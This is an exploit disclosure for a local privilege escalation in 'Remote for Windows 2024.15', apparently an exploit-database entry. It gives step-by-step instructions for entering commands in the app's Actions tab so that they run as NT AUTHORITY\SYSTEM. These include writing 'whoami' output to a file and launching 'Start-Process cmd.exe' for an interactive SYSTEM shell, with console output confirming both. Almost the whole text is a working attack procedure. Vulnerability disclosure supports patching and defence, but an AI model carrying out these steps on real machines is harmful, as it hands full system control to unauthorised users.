# Exploit Title: Remote for Windows 2024.15 - Local Privilege Escalation
# Date: 2025-05-19
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)

1. open Remote for windows
2. go to actions tab
3. click on "Add.." button
4. in action text area put the following command:
whoami > c:\pwned.txt

5. click on run button
6. viewing the content of c:\pwned.txt shows:

nt authority\system

the command runs as system.


Alternative PoC: Spawning a SYSTEM Shell

1. Repeat the same steps as above, but enter the following in the action
text box:
   Start-Process cmd.exe
2. Click “Run”.
3. A new Command Prompt window will appear running as *NT AUTHORITY\SYSTEM*,
providing a fully interactive SYSTEM-level shell.

Microsoft Windows [Version 10.0.19045.5011]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>